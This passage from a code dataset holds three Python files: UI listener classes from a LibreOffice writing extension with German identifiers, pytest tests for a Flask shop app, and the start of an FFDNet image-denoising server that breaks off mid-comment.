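# toggles the Tag1/Tag2/Gliederung columns in the tree view and persists the choice via speicher_settings('project_settings.txt', ...)\n    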
def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n \n def mouseExited(self, ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n def mousePressed(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n try:\n text = ev.Source.Text\n sett = self.mb.settings_proj\n \n \n if text == LANG.SHOW_TAG1:\n nummer = 1\n lang_show_tag = LANG.SHOW_TAG1\n \n elif text == LANG.SHOW_TAG2:\n if not self.pruefe_galerie_eintrag():\n return\n nummer = 2\n lang_show_tag = LANG.SHOW_TAG2\n \n elif text == LANG.GLIEDERUNG:\n nummer = 3\n lang_show_tag = LANG.GLIEDERUNG\n \n tag = 'tag%s'%nummer\n sett[tag] = not sett[tag]\n \n self.mache_tag_sichtbar(sett[tag],tag)\n ctrl = ev.Source.Context.getControl(lang_show_tag+'_icon')\n \n if sett[tag]:\n ctrl.Model.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n else:\n ctrl.Model.ImageURL = '' \n \n self.mb.speicher_settings(\"project_settings.txt\", self.mb.settings_proj) \n except:\n log(inspect.stack,tb())\n \n \n \n \n def mache_tag_sichtbar(self,sichtbar,tag_name):\n if self.mb.debug: log(inspect.stack)\n \n sett = self.mb.settings_proj\n tags = sett['tag1'],sett['tag2'],sett['tag3']\n \n for tab_name in self.mb.props:\n \n # alle Zeilen\n controls_zeilen = self.mb.props[tab_name].Hauptfeld.Controls\n tree = self.mb.props[tab_name].xml_tree\n root = tree.getroot()\n \n gliederung = None\n if sett['tag3']:\n gliederung = self.mb.class_Gliederung.rechne(tree)\n \n if not sichtbar:\n for contr_zeile in controls_zeilen:\n ord_zeile = contr_zeile.AccessibleContext.AccessibleName\n if ord_zeile == self.mb.props[T.AB].Papierkorb:\n continue\n \n self.mb.class_Baumansicht.positioniere_icons_in_zeile(contr_zeile,tags,gliederung)\n tag_contr = contr_zeile.getControl(tag_name)\n tag_contr.dispose()\n \n \n if sichtbar:\n for contr_zeile in controls_zeilen: \n\n ord_zeile = contr_zeile.AccessibleContext.AccessibleName\n if ord_zeile == self.mb.props[T.AB].Papierkorb:\n continue\n \n zeile_xml = root.find('.//'+ord_zeile)\n \n if tag_name == 'tag1':\n farbe = zeile_xml.attrib['Tag1']\n url = 'vnd.sun.star.extension://xaver.roemers.organon/img/punkt_%s.png' % farbe\n listener = self.mb.class_Baumansicht.tag1_listener\n elif tag_name == 'tag2':\n url = zeile_xml.attrib['Tag2']\n listener = self.mb.class_Baumansicht.tag2_listener\n elif tag_name == 'tag3':\n url = ''\n \n if tag_name in ('tag1','tag2'):\n PosX,PosY,Width,Height = 0,2,16,16\n control_tag1, model_tag1 = self.mb.createControl(self.mb.ctx,\"ImageControl\",PosX,PosY,Width,Height,(),() ) \n model_tag1.ImageURL = url\n model_tag1.Border = 0\n control_tag1.addMouseListener(listener)\n else:\n PosX,PosY,Width,Height = 0,2,16,16\n control_tag1, model_tag1 = self.mb.createControl(self.mb.ctx,\"FixedText\",PosX,PosY,Width,Height,(),() ) \n model_tag1.TextColor = KONST.FARBE_GLIEDERUNG\n \n contr_zeile.addControl(tag_name,control_tag1)\n self.mb.class_Baumansicht.positioniere_icons_in_zeile(contr_zeile,tags,gliederung)\n \n \n def pruefe_galerie_eintrag(self):\n if self.mb.debug: log(inspect.stack)\n \n gallery = self.mb.createUnoService(\"com.sun.star.gallery.GalleryThemeProvider\")\n \n if 'Organon Icons' not in gallery.ElementNames:\n \n paths = self.mb.smgr.createInstance( \"com.sun.star.util.PathSettings\" )\n gallery_pfad = uno.fileUrlToSystemPath(paths.Gallery_writable)\n gallery_ordner = 
os.path.join(gallery_pfad,'Organon Icons')\n \n entscheidung = self.mb.nachricht(LANG.BENUTZERDEFINIERTE_SYMBOLE_NUTZEN %gallery_ordner,\"warningbox\",16777216)\n # 3 = Nein oder Cancel, 2 = Ja\n if entscheidung == 3:\n return False\n elif entscheidung == 2:\n try:\n iGal = gallery.insertNewByName('Organon Icons') \n path_icons = os.path.join(self.mb.path_to_extension,'img','Organon Icons')\n \n from shutil import copy \n \n # Galerie anlegen\n if not os.path.exists(gallery_ordner):\n os.makedirs(gallery_ordner)\n \n # Organon Icons einfuegen\n for (dirpath,dirnames,filenames) in os.walk(path_icons):\n for f in filenames:\n url_source = os.path.join(dirpath,f)\n url_dest = os.path.join(gallery_ordner,f)\n \n copy(url_source,url_dest)\n \n url = uno.systemPathToFileUrl(url_dest)\n iGal.insertURLByIndex(url,0)\n \n return True\n \n except:\n log(inspect.stack,tb())\n \n return True\n\nclass DropDown_Tags_SB_Listener(unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n self.mb = mb\n def mouseExited(self, ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n def mousePressed(self, ev): \n if self.mb.debug: log(inspect.stack) \n try:\n name = ev.Source.Text \n ctrl = ev.Source.Context.getControl(name+'_icon') \n #state = ev.Source.State\n \n panels = self.mb.class_Sidebar.sb_panels2\n if ctrl.Model.ImageURL == 'private:graphicrepository/svx/res/apply.png':\n self.mb.dict_sb['sichtbare'].remove(panels[name])\n ctrl.Model.ImageURL = '' \n else:\n self.mb.dict_sb['sichtbare'].append(panels[name])\n ctrl.Model.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n \n \n # Wenn die Sidebar sichtbar ist, auf und zu schalten,\n # um den Sidebar tag sichtbar zu machen \n try:\n controls = self.mb.dict_sb['controls']\n if controls != {}:\n okey = list(controls)[0]\n xParent = controls[okey][0].xParentWindow\n if xParent.isVisible():\n self.mb.class_Sidebar.schalte_sidebar_button()\n #pd()\n ev.Source.setFocus()\n except:\n log(inspect.stack,tb()) \n \n except:\n log(inspect.stack,tb()) \n\n\n \nfrom com.sun.star.awt import Rectangle\nfrom com.sun.star.awt import WindowDescriptor \nfrom com.sun.star.awt.WindowClass import MODALTOP\nfrom com.sun.star.awt.VclWindowPeerAttribute import OK,YES_NO_CANCEL, DEF_NO\n\nclass Mitteilungen():\n def __init__(self,ctx,mb):\n if mb.debug: log(inspect.stack)\n \n self.ctx = ctx\n self.mb = mb \n \n def nachricht(self, MsgText, MsgType=\"errorbox\", MsgButtons=OK): \n if self.mb.debug: log(inspect.stack) \n\n smgr = self.ctx.ServiceManager\n desktop = smgr.createInstanceWithContext( \"com.sun.star.frame.Desktop\",self.ctx)\n doc = desktop.getCurrentComponent() \n ParentWin = doc.CurrentController.Frame.ContainerWindow\n\n MsgTitle = \"Mitteilung\"\n MsgType = MsgType.lower()\n #available msg types\n MsgTypes = (\"messbox\", \"infobox\", \"errorbox\", \"warningbox\", \"querybox\")\n \n if MsgType not in MsgTypes:\n MsgType = \"messbox\"\n \n #describe window properties.\n aDescriptor = WindowDescriptor()\n aDescriptor.Type = MODALTOP\n aDescriptor.WindowServiceName = MsgType\n aDescriptor.ParentIndex = -1\n aDescriptor.Parent = ParentWin\n aDescriptor.Bounds = Rectangle()\n aDescriptor.WindowAttributes = MsgButtons\n \n tk = ParentWin.getToolkit()\n msgbox = tk.createWindow(aDescriptor)\n msgbox.MessageText = MsgText\n\n x = msgbox.execute()\n 
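# execute() returns the code of the pressed button; cf. pruefe_galerie_eintrag above: 2 = Ja, 3 = Nein/Cancel for YES_NO_CANCEL boxes\n        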
msgbox.dispose()\n return x\n \n def kurze_mitteilung(self):\n pass\n\nfrom com.sun.star.document import XUndoManagerListener \nclass Undo_Manager_Listener(unohelper.Base,XUndoManagerListener): \n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb \n self.textbereiche = ()\n \n \n def enteredContext(self,ev):\n if self.mb.use_UM_Listener == False:\n return\n if ev.UndoActionTitle == self.mb.BEREICH_EINFUEGEN:\n if self.mb.debug: log(inspect.stack)\n \n if self.mb.doc.TextSections.Count == 0:\n self.textbereiche = ()\n else:\n self.textbereiche = self.mb.doc.TextSections.ElementNames\n \n \n def leftContext(self,ev):\n if self.mb.use_UM_Listener == False:\n return\n if ev.UndoActionTitle == self.mb.BEREICH_EINFUEGEN:\n if self.mb.debug: log(inspect.stack)\n \n for tbe in self.mb.doc.TextSections.ElementNames:\n if 'trenner' not in tbe:\n if tbe not in self.textbereiche:\n self.bereich_in_OrganonSec_einfuegen(tbe)\n \n \n def undoActionAdded(self,ev):return False\n def actionUndone(self,ev):return False\n def actionRedone(self,ev):return False\n def allActionsCleared(self,ev):return False\n def redoActionsCleared(self,ev):return False\n def resetAll(self,ev):return False\n def enteredHiddenContext(self,ev):return False\n def leftHiddenContext(self,ev):return False\n def cancelledContext(self,ev):return False\n def disposing(self,ev):return False\n \n def bereich_in_OrganonSec_einfuegen(self,tbe):\n if self.mb.debug: log(inspect.stack)\n \n text = self.mb.doc.Text\n vc = self.mb.viewcursor\n TS = self.mb.doc.TextSections\n \n sec = TS.getByName(tbe)\n sec_name = sec.Name\n \n if sec.ParentSection == None:\n \n position_neuer_Bereich = None\n \n cur2 = self.mb.doc.Text.createTextCursorByRange(vc)\n cur2.collapseToStart()\n cur2.goLeft(1,False)\n \n if cur2.TextSection == sec:\n position_neuer_Bereich = 'davor'\n \n else:\n cur2.gotoRange(vc,False)\n cur2.collapseToEnd()\n cur2.goRight(1,False)\n \n if cur2.TextSection == sec:\n position_neuer_Bereich = 'danach'\n \n cur = self.mb.doc.Text.createTextCursorByRange(vc)\n cur.collapseToEnd()\n \n if position_neuer_Bereich == 'davor':\n \n cur.gotoRange(sec.Anchor,True)\n cur.setString('')\n self.mb.doc.Text.insertString(vc,' ',False)\n cur.gotoRange(vc,False)\n goLeft = 1\n \n elif position_neuer_Bereich == 'danach':\n \n self.mb.doc.Text.insertString(vc,' ',False)\n \n cur.gotoRange(sec.Anchor,True)\n cur.setString('')\n cur.gotoRange(vc,False)\n cur.goLeft(1,False)\n goLeft = 2\n \n else:\n return\n \n newSection = self.mb.doc.createInstance(\"com.sun.star.text.TextSection\")\n newSection.setName(sec_name)\n \n self.mb.undo_mgr.removeUndoManagerListener(self.mb.undo_mgr_listener)\n self.mb.doc.Text.insertTextContent(cur,newSection,False)\n self.mb.undo_mgr.addUndoManagerListener(self.mb.undo_mgr_listener)\n \n vc.goLeft(goLeft,False)\n\n # Wenn ein Bereich eingefuegt wurde, auf jeden Fall speichern\n section = vc.TextSection\n while section != None:\n bereichsname = section.Name\n section = section.ParentSection\n \n path = self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname]\n path = uno.systemPathToFileUrl(path)\n self.mb.props[T.AB].tastatureingabe = True\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname)\n \n\nfrom com.sun.star.awt import XKeyHandler\nclass Key_Handler(unohelper.Base, XKeyHandler):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.mb.keyhandler = self\n mb.current_Contr.addKeyHandler(self)\n \n def keyPressed(self,ev):\n 
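# flag the keystroke so the touched section is saved on the next selection change or tab switch (see the datei_nach_aenderung_speichern calls)\n        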
#print(ev.KeyChar)\n self.mb.props[T.AB].tastatureingabe = True\n self.mb.props[T.AB].zuletzt_gedrueckte_taste = ev\n return False\n \n def keyReleased(self,ev):\n \n if self.mb.projekt_name != None:\n # Wenn eine OrganonSec durch den Benutzer geloescht wird, wird die Aktion rueckgaengig gemacht\n # KeyCodes: backspace, delete\n if ev.KeyCode in (1283,1286):\n anz_im_bereiche_dict = len(self.mb.props[T.AB].dict_bereiche['ordinal'])\n anz_im_dok = 0\n for sec in self.mb.doc.TextSections.ElementNames:\n if 'OrganonSec' in sec:\n anz_im_dok += 1\n if anz_im_dok < anz_im_bereiche_dict:\n if self.mb.debug: log(inspect.stack)\n self.mb.doc.UndoManager.undo()\n return False\n\n\nfrom com.sun.star.view import XSelectionChangeListener\nclass ViewCursor_Selection_Listener(unohelper.Base, XSelectionChangeListener):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.ts_old = 'nicht vorhanden'\n self.mb.selbstruf = False\n \n def disposing(self,ev):\n if self.mb.debug: log(inspect.stack)\n return False\n \n def selectionChanged(self,ev):\n if self.mb.debug: log(inspect.stack)\n\n try:\n if self.mb.selbstruf:\n #if self.mb.debug: print('selection selbstruf')\n return False\n \n selected_ts = self.mb.current_Contr.ViewCursor.TextSection \n if selected_ts == None:\n return False\n #log(inspect.stack,extras=selected_ts.Name)\n s_name = selected_ts.Name\n\n # stellt sicher, dass nur selbst erzeugte Bereiche angesprochen werden\n # und der Trenner uebersprungen wird\n if 'trenner' in s_name:\n\n if self.mb.props[T.AB].zuletzt_gedrueckte_taste == None:\n try:\n self.mb.viewcursor.goDown(1,False)\n except:\n self.mb.viewcursor.goUp(1,False)\n return False\n # 1024,1027 Pfeil runter,rechts\n elif self.mb.props[T.AB].zuletzt_gedrueckte_taste.KeyCode in (1024,1027): \n self.mb.viewcursor.goDown(1,False) \n else:\n self.mb.viewcursor.goUp(1,False)\n # sollte der viewcursor immer noch auf einem Trenner stehen,\n # befindet er sich im letzten Bereich -> goUp \n if 'trenner' in self.mb.viewcursor.TextSection.Name:\n self.mb.viewcursor.goUp(1,False)\n return False \n \n # test ob ausgewaehlter Bereich ein Kind-Bereich ist -> Selektion wird auf Parent gesetzt\n elif 'trenner' not in s_name and 'OrganonSec' not in s_name:\n sec = []\n self.test_for_parent_section(selected_ts,sec)\n selected_ts = sec[0]\n s_name = selected_ts.Name\n #log(inspect.stack,extras=s_name)\n # steht nach test_for... selcted_text... 
nicht auf einer OrganonSec, \n # ist der Bereich außerhalb des Organon trees\n if 'OrganonSec' not in selected_ts.Name:\n return False\n \n props = self.mb.props \n \n self.so_name = None \n\n if self.mb.props[T.AB].selektierte_zeile_alt != None:\n ts_old_bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][self.mb.props[T.AB].selektierte_zeile_alt]\n self.ts_old = self.mb.doc.TextSections.getByName(ts_old_bereichsname) \n self.so_name = self.mb.props[T.AB].dict_bereiche['ordinal'][self.mb.props[T.AB].selektierte_zeile_alt]\n #pd()\n if self.ts_old == 'nicht vorhanden':\n #print('selek gewechs, old nicht vorhanden')\n self.ts_old = selected_ts \n ordinal = self.mb.props[T.AB].dict_bereiche['Bereichsname-ordinal'][s_name]\n self.mb.props[T.AB].selektierte_zeile = ordinal\n self.mb.props[T.AB].selektierte_zeile_alt = ordinal\n return False \n \n elif self.mb.props[T.AB].Papierkorb_geleert == True:\n #print('selek gewechs, Papierkorb_geleert')\n # fehlt: nur speichern, wenn die Datei nicht im Papierkorb gelandet ist\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(self.ts_old.FileLink.FileURL,self.so_name)\n self.ts_old = selected_ts \n self.mb.props[T.AB].Papierkorb_geleert = False \n return False \n else:\n if self.ts_old == selected_ts:\n #print('selek nix gewechs',self.so_name , s_name)\n return False \n else:\n #print('selek gewechs',self.so_name , s_name) \n self.farbe_der_selektion_aendern(selected_ts.Name)\n if self.mb.props[T.AB].tastatureingabe:\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(self.ts_old.FileLink.FileURL,self.so_name)\n \n self.ts_old = selected_ts \n except:\n log(inspect.stack,tb())\n\n \n def test_for_parent_section(self,selected_text_sectionX,sec):\n if self.mb.debug: log(inspect.stack)\n \n if selected_text_sectionX.ParentSection != None:\n selected_text_sectionX = selected_text_sectionX.ParentSection\n self.test_for_parent_section(selected_text_sectionX,sec)\n else:\n sec.append(selected_text_sectionX)\n \n \n def farbe_der_selektion_aendern(self,bereichsname): \n if self.mb.debug: log(inspect.stack) \n\n ordinal = self.mb.props[T.AB].dict_bereiche['Bereichsname-ordinal'][bereichsname]\n zeile = self.mb.props[T.AB].Hauptfeld.getControl(ordinal)\n textfeld = zeile.getControl('textfeld')\n \n self.mb.props[T.AB].selektierte_zeile = zeile.AccessibleContext.AccessibleName\n # selektierte Zeile einfaerben, ehem. sel. 
\nfrom com.sun.star.awt import XAdjustmentListener\nclass ScrollBar_Listener (unohelper.Base,XAdjustmentListener):\n    def __init__(self,debug,fenster_cont): \n        if debug: log(inspect.stack) \n        self.fenster_cont = fenster_cont\n    def adjustmentValueChanged(self,ev):\n        self.fenster_cont.setPosSize(0, -ev.value.Value,0,0,2)\n    def disposing(self,ev):\n        return False\n\n \nfrom com.sun.star.awt import XWindowListener\nfrom com.sun.star.lang import XEventListener\nclass Dialog_Window_Listener(unohelper.Base,XWindowListener,XEventListener):\n    \n    def __init__(self,mb):\n        if mb.debug: log(inspect.stack)\n        \n        self.mb = mb\n        \n    def windowResized(self,ev):\n        #print('windowResized')\n        self.korrigiere_hoehe_des_scrollbalkens()\n        self.mb.class_Baumansicht.korrigiere_scrollbar()\n    def windowMoved(self,ev):pass\n        #print('windowMoved')\n    def windowShown(self,ev):\n        self.korrigiere_hoehe_des_scrollbalkens()\n        #print('windowShown')\n    def windowHidden(self,ev):pass\n\n    def korrigiere_hoehe_des_scrollbalkens(self):\n        if self.mb.debug: log(inspect.stack)\n        \n        try:\n            active_tab = self.mb.active_tab_id\n            win = self.mb.tabs[active_tab][0]\n            nav_cont_aussen = win.getControl('Hauptfeld_aussen')\n\n            # nav_cont_aussen is None as long as no project has been opened yet\n            if nav_cont_aussen != None:\n                nav_cont = nav_cont_aussen.getControl('Hauptfeld')\n                \n                MenuBar = win.getControl('Organon_Menu_Bar')\n                MBHoehe = MenuBar.PosSize.value.Height + MenuBar.PosSize.value.Y\n                NCHoehe = 0 #nav_cont.PosSize.value.Height\n                NCPosY = nav_cont.PosSize.value.Y\n                Y = NCHoehe + NCPosY + MBHoehe\n                Height = win.PosSize.value.Height - Y -25\n                \n                scrll = win.getControl('ScrollBar')\n                scrll.setPosSize(0,0,0,Height,8)\n        except:\n            log(inspect.stack,tb())\n\n\n    def disposing(self,arg):\n        if self.mb.debug: log(inspect.stack)\n        \n        try: \n            # save when Organon is shut down;\n            # changes made after a tab switch are saved in Tab_Listener.activated()\n            if self.mb.props[T.AB].tastatureingabe:\n                ordinal = self.mb.props[T.AB].selektierte_zeile\n                bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][ordinal]\n                path = uno.systemPathToFileUrl(self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname])\n                self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname) \n\n            if 'files' in self.mb.pfade: \n                self.mb.class_Sidebar.speicher_sidebar_dict() \n                self.mb.class_Sidebar.dict_sb_zuruecksetzen()\n\n            self.mb.entferne_alle_listener() \n            self.mb = None\n\n        except:\n            log(inspect.stack,tb())\n        \n        return False\n\n\n \n    \n","sub_path":"source/py/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":78841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
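The listener classes in menu_bar.py above all share one PyUNO shape: subclass unohelper.Base together with the UNO interface, implement its callbacks, and clean up in disposing(). A minimal, self-contained skeleton of that pattern (the interface choice and registration call here are illustrative; they match the boolean-returning key callbacks used above, which suggests XKeyHandler registered via the controller's addKeyHandler):

import unohelper
from com.sun.star.awt import XKeyHandler

class MinimalKeyHandler(unohelper.Base, XKeyHandler):
    def keyPressed(self, ev):
        return False   # False: let the event propagate to the document
    def keyReleased(self, ev):
        return False
    def disposing(self, ev):
        pass           # drop references here so the UNO bridge can clean up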
{"seq_id":"138417110","text":"import http\nimport json\nimport pytest\nfrom market import api, app, db\nfrom market.models import Item, User\nfrom unittest.mock import patch\nfrom api import routes\n\n\nclass TestItems:\n    id = []\n\n    def test_get_items_with_db(self):\n        client = app.test_client()\n        resp = client.get('/items')\n\n        assert resp.status_code == http.HTTPStatus.OK\n\n    @patch('api.services.item_service.ItemService.fetch_all_items', autospec=True)\n    def test_get_items_mock_db(self, mock_db_call):\n        client = app.test_client()\n        resp = client.get('/items')\n\n        mock_db_call.assert_called_once()\n        assert resp.status_code == http.HTTPStatus.OK\n        assert len(resp.json) == 0\n\n    def test_create_item_with_db(self):\n        client = app.test_client()\n        data = {\n            'name': 'tester',\n            'price': 12,\n            'barcode': '9214789632188',\n            'description': 'st',\n\n        }\n\n        resp = client.post('/items', data=json.dumps(data), content_type='application/json')\n        assert resp.status_code == http.HTTPStatus.CREATED\n        assert data['name'] == 'tester'\n        TestItems.id.append(data['name'])\n\n    def test_create_item_with_mock_db(self):\n        with patch(\"api.db.session.add\", autospec=True) as mock_session_add, \\\n                patch(\"api.db.session.commit\", autospec=True) as mock_session_commit:\n            client = app.test_client()\n            data = {\n                'name': 'tester',\n                'price': 12,\n                'barcode': '9214789632188',\n                'description': 'st',\n            }\n            resp = client.post('/items', data=json.dumps(data), content_type='application/json')\n            mock_session_add.assert_called_once()\n            mock_session_commit.assert_called_once()\n\n    def test_update_item_with_db(self):\n        client = app.test_client()\n        url = f'/items/{self.id[0]}'\n        data = {\n            'name': 'Update name2',\n            'price': 32,\n            'barcode': '3214755532172',\n            'description': 'Updated description',\n        }\n        client.put(url, data=json.dumps(data), content_type='application/json')\n\n        assert data['name'] == 'Update name2'\n\n\nclass Test_Flask_App:\n    def test_home_page(self):\n        client = app.test_client()\n        resp = client.get('/home')\n\n        assert resp.status_code == http.HTTPStatus.OK\n\n    def test_market_page(self):\n        client = app.test_client()\n        resp = client.get('/market')\n        assert resp.status_code == http.HTTPStatus.FOUND\n\n    def test_register_page(self):\n        client = app.test_client()\n        resp = client.get('/register')\n        assert resp.status_code == http.HTTPStatus.OK\n\n    def test_login_page(self):\n        client = app.test_client()\n        resp = client.get('/login')\n        assert resp.status_code == http.HTTPStatus.OK\n\n    def test_logout_page(self):\n        client = app.test_client()\n        resp = client.get('/logout')\n        assert resp.status_code == http.HTTPStatus.FOUND\n\n\nclass Test_Model:\n    def test_password_hashing(self):\n        u1 = User(username='u1')\n        u1.password = 'topolya'\n        assert u1.check_password_correction('tut') == False\n        assert u1.check_password_correction('topolya') == True\n\n    def test_can_purchase(self):\n        budget = 2000\n        i = Item(name='Iphone 10', description='description', barcode='123456789123', price=300)\n        assert budget > i.price\n\n    def test_can_sell(self):\n        i1 = Item(name='TurboBookPro', description='The best invention by Apple', barcode='123456654456', price=2500)\n        i2 = Item(name='MacBookPro', description='description2', barcode='123456789321', price=2000)\n        item_obj = 'TurboBookPro'\n        items = [i1.name, i2.name]\n        assert item_obj in items\n\n    def test_buy(self):\n        u = User(username='Test_name', budget=1000)\n        i = Item(name='TurboBookPro',description='The best invention ', barcode='123456654450', price=500)\n        # pytest ignores plain return values, so the condition must be asserted\n        assert u.budget >= i.price\n\n    def test_sell(self):\n        u = User(username='Test_name', budget=1000)\n        i = Item(name='TurboBookPro',description='The best ', barcode='123456654458', price=500)\n        start_budget = u.budget\n        u.budget += i.price\n        assert u.budget >= start_budget\n","sub_path":"tests/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
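Test_Model above exercises User.check_password_correction without showing the model itself. One common shape for such a method, assuming werkzeug's hashing helpers are available (the real market.models implementation may differ):

from werkzeug.security import generate_password_hash, check_password_hash

class UserSketch:
    password_hash = None

    @property
    def password(self):
        raise AttributeError('password is write-only')

    @password.setter
    def password(self, plain_text):
        # store only the salted hash, never the plain text
        self.password_hash = generate_password_hash(plain_text)

    def check_password_correction(self, attempted_password):
        return check_password_hash(self.password_hash, attempted_password)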
{"seq_id":"467055034","text":"\"\"\"\nDenoise an image with the FFDNet denoising method\n\nCopyright (C) 2018, Matias Tassano \n\nThis program is free software: you can use, modify and/or\nredistribute it under the terms of the GNU General Public\nLicense as published by the Free Software Foundation, either\nversion 3 of the License, or (at your option) any later\nversion. You should have received a copy of this license along\nthis program. If not, see <http://www.gnu.org/licenses/>.\n\"\"\"\nimport os\nimport argparse\nimport time\nimport numpy as np\nimport cv2\nimport torch\nfrom PIL import Image\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom utils import batch_psnr, normalize, init_logger_ipol, \\\n    variable_to_cv2_image, remove_dataparallel_wrapper, is_rgb\nfrom sanic import Sanic, response\n\n\"\"\"\nDefinition of the FFDNet model and its custom layers\n\nCopyright (C) 2018, Matias Tassano \n\nThis program is free software: you can use, modify and/or\nredistribute it under the terms of the GNU General Public\nLicense as published by the Free Software Foundation, either\nversion 3 of the License, or (at your option) any later\nversion. You should have received a copy of this license along\nthis program. If not, see <http://www.gnu.org/licenses/>.\n\"\"\"\n# torch.nn and Variable are already imported above; only the project's custom\n# functions module is still needed for the inlined model definition\nimport functions\n\n\nclass UpSampleFeatures(nn.Module):\n    r\"\"\"Implements the last layer of FFDNet\n    \"\"\"\n\n    def __init__(self):\n        super(UpSampleFeatures, self).__init__()\n\n    def forward(self, x):\n        return functions.upsamplefeatures(x)\n\n\nclass IntermediateDnCNN(nn.Module):\n    r\"\"\"Implements the middle part of the FFDNet architecture, which\n    is basically a DnCNN net\n    \"\"\"\n\n    def __init__(self, input_features, middle_features, num_conv_layers):\n        super(IntermediateDnCNN, self).__init__()\n        self.kernel_size = 3\n        self.padding = 1\n        self.input_features = input_features\n        self.num_conv_layers = num_conv_layers\n        self.middle_features = middle_features\n        if self.input_features == 5:\n            self.output_features = 4  # Grayscale image\n        elif self.input_features == 15:\n            self.output_features = 12  # RGB image\n        else:\n            raise Exception('Invalid number of input features')\n\n        layers = []\n        layers.append(nn.Conv2d(in_channels=self.input_features, \\\n                                out_channels=self.middle_features, \\\n                                kernel_size=self.kernel_size, \\\n                                padding=self.padding, \\\n                                bias=False))\n        layers.append(nn.ReLU(inplace=True))\n        for _ in range(self.num_conv_layers - 2):\n            layers.append(nn.Conv2d(in_channels=self.middle_features, \\\n                                    out_channels=self.middle_features, \\\n                                    kernel_size=self.kernel_size, \\\n                                    padding=self.padding, \\\n                                    bias=False))\n            layers.append(nn.BatchNorm2d(self.middle_features))\n            layers.append(nn.ReLU(inplace=True))\n        layers.append(nn.Conv2d(in_channels=self.middle_features, \\\n                                out_channels=self.output_features, \\\n                                kernel_size=self.kernel_size, \\\n                                padding=self.padding, \\\n                                bias=False))\n        self.itermediate_dncnn = nn.Sequential(*layers)\n\n    def forward(self, x):\n        out = self.itermediate_dncnn(x)\n        return out\n\n\nclass FFDNet(nn.Module):\n    r\"\"\"Implements the FFDNet architecture\n    \"\"\"\n\n    def __init__(self, num_input_channels, test_mode=False):\n        super(FFDNet, self).__init__()\n        self.num_input_channels = num_input_channels\n        self.test_mode = test_mode\n        if self.num_input_channels == 1:\n            # Grayscale 
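# Where the 5/15 input-channel counts above come from (sketch): FFDNet runs on
# a 2x2-downsampled image, so a C-channel frame becomes 4C channels, plus C
# noise-map channels -> 5 for grayscale, 15 for RGB. An illustrative shape
# check (F.pixel_unshuffle needs PyTorch >= 1.8; the project's own
# functions.concatenate_input_noise_map plays this role in the code here):
import torch
import torch.nn.functional as F

def input_channel_sketch(x, noise_sigma):
    # x: (N, C, H, W) with even H and W; noise_sigma: (N,)
    down = F.pixel_unshuffle(x, 2)                      # (N, 4C, H/2, W/2)
    n, c = x.shape[0], x.shape[1]
    h, w = down.shape[2], down.shape[3]
    noise_map = noise_sigma.view(n, 1, 1, 1).expand(n, c, h, w)
    return torch.cat((noise_map, down), dim=1)          # (N, 5C, H/2, W/2)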
image\n self.num_feature_maps = 64\n self.num_conv_layers = 15\n self.downsampled_channels = 5\n self.output_features = 4\n elif self.num_input_channels == 3:\n # RGB image\n self.num_feature_maps = 96\n self.num_conv_layers = 12\n self.downsampled_channels = 15\n self.output_features = 12\n else:\n raise Exception('Invalid number of input features')\n\n self.intermediate_dncnn = IntermediateDnCNN( \\\n input_features=self.downsampled_channels, \\\n middle_features=self.num_feature_maps, \\\n num_conv_layers=self.num_conv_layers)\n self.upsamplefeatures = UpSampleFeatures()\n\n def forward(self, x, noise_sigma):\n concat_noise_x = functions.concatenate_input_noise_map( \\\n x.data, noise_sigma.data)\n if self.test_mode:\n concat_noise_x = Variable(concat_noise_x, volatile=True)\n else:\n concat_noise_x = Variable(concat_noise_x)\n h_dncnn = self.intermediate_dncnn(concat_noise_x)\n pred_noise = self.upsamplefeatures(h_dncnn)\n return pred_noise\n\n\n# from srpgan_api import evaluate\n\napp = Sanic(__name__)\n\n# os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\nr\"\"\"Denoises an input image with FFDNet\n\"\"\"\n# Init logger\nlogger = init_logger_ipol()\n\n# Check if input exists and if it is RGB\n# Absolute path to model file\nmodel_fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), \\\n 'models/net_rgb.pth')\n\n# Create model\nprint('Loading model ...\\n')\nnet = FFDNet(num_input_channels=3, test_mode=True)\nmodel_fn = os.path.join(os.path.abspath(os.path.dirname(__file__)), \\\n model_fn)\n\n# Load saved weights\nprint(model_fn)\nstate_dict = torch.load(model_fn, map_location='cpu')\ndevice_ids = [0]\n# model = nn.DataParallel(net, device_ids=device_ids).cuda()\nmodel = nn.DataParallel(net, device_ids=device_ids)\nmodel.load_state_dict(state_dict)\n\n# Sets the model in evaluation mode (e.g. 
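# Note on the checkpoint load above (sketch): weights saved from an
# nn.DataParallel-wrapped model carry a 'module.' key prefix, which is why
# utils.remove_dataparallel_wrapper is imported; here the bare net is wrapped
# in DataParallel instead, so the prefixed keys match. A minimal equivalent of
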